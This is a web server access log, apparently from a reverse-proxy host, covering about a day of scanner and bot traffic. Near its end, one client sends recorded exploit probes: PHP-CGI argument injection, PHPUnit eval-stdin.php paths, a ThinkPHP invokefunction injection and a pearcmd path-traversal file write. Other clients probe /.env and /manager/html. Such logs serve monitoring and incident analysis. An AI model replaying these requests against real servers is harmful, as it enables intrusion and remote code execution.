(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:19:52:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:20:11:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:20:12:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:20:36:56 +0000] 400 - GET http 222.117.41.51 "/" [Client 20.64.105.206] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[17/Feb/2026:20:36:57 +0000] 400 - - http localhost "-" [Client 20.64.105.206] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:20:37:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:20:58:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:21:01:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:21:06:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 568] [Gzip 1.86] "Linux Gnu (cow)" "-" +[17/Feb/2026:21:25:22 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36" "-" +[17/Feb/2026:21:28:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:21:30:48 +0000] 400 - - http localhost "-" [Client 20.14.73.198] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:21:43:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:21:44:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 170.106.15.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:21:54:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:21:58:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:22:08:04 +0000] 400 - - http localhost "-" [Client 176.65.148.19] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:22:20:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:22:33:02 +0000] 404 - GET http 222.117.41.51 "/developmentserver/metadatauploader" [Client 52.186.171.52] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[17/Feb/2026:22:36:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:22:37:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[17/Feb/2026:22:44:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:23:01:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:23:12:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:23:21:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.139.136] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[17/Feb/2026:23:30:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[17/Feb/2026:23:33:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:23:36:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:23:56:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Feb/2026:23:59:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:00:06:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:00:07:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:00:26:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:00:29:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:00:53:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:00:53:57 +0000] 405 - POST http 222.117.41.51 "/" [Client 67.213.118.179] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" "-" +[18/Feb/2026:00:53:58 +0000] 405 - POST http 222.117.41.51 "/" [Client 67.213.118.179] [Length 154] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/5.0" "-" +[18/Feb/2026:01:03:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:01:12:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.192] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:01:15:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:01:26:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:01:40:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:01:59:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:02:06:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:02:24:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:02:32:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:02:50:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:02:57:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:03:00:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:03:03:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.32.195.85] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:03:04:21 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[18/Feb/2026:03:04:21 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[18/Feb/2026:03:04:22 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[18/Feb/2026:03:04:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:03:04:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:03:11:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.131] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:03:11:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.131] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:03:24:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:03:25:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:03:30:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.92.1.85] [Length 0] [Gzip -] "-" "-" +[18/Feb/2026:03:41:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 147.185.133.29] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[18/Feb/2026:03:47:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:04:00:02 +0000] 400 - GET http 222.117.41.51 "/manager/html" [Client 40.124.172.38] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[18/Feb/2026:04:00:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:04:03:59 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.95] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[18/Feb/2026:04:14:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:04:16:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:04:17:02 +0000] 400 - - http localhost "-" [Client 40.124.173.171] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:04:17:03 +0000] 400 - - http localhost "-" [Client 40.124.173.171] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:04:37:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.82.202.127] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[18/Feb/2026:04:37:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:04:50:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 95.215.0.144] [Length 1033] [Gzip -] "fasthttp" "-" +[18/Feb/2026:04:50:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.7] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:04:50:31 +0000] 404 - GET http 222.117.41.51 "/aaa9" [Client 45.91.64.7] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Feb/2026:04:50:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.7] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:04:50:31 +0000] 404 - GET http 222.117.41.51 "/aab9" [Client 45.91.64.7] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Feb/2026:04:53:38 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 177.70.2.220] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:04:53:41 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 177.70.2.220] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:04:53:41 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:43 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 177.70.2.220] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:46 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:48 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:49 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:50 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:52 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:53 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:55 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:56 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:58 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:53:59 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:01 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:02 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:04 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:05 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:07 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:08 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:10 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:11 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:13 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:14 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:15 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:16 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:17 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:18 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:19 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:20 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:21 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:22 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:23 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:24 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:25 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:26 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:26 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:27 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:29 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:29 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:30 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:31 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:33 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:33 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:04:54:34 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:05:01:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:05:01:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.105.21] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" 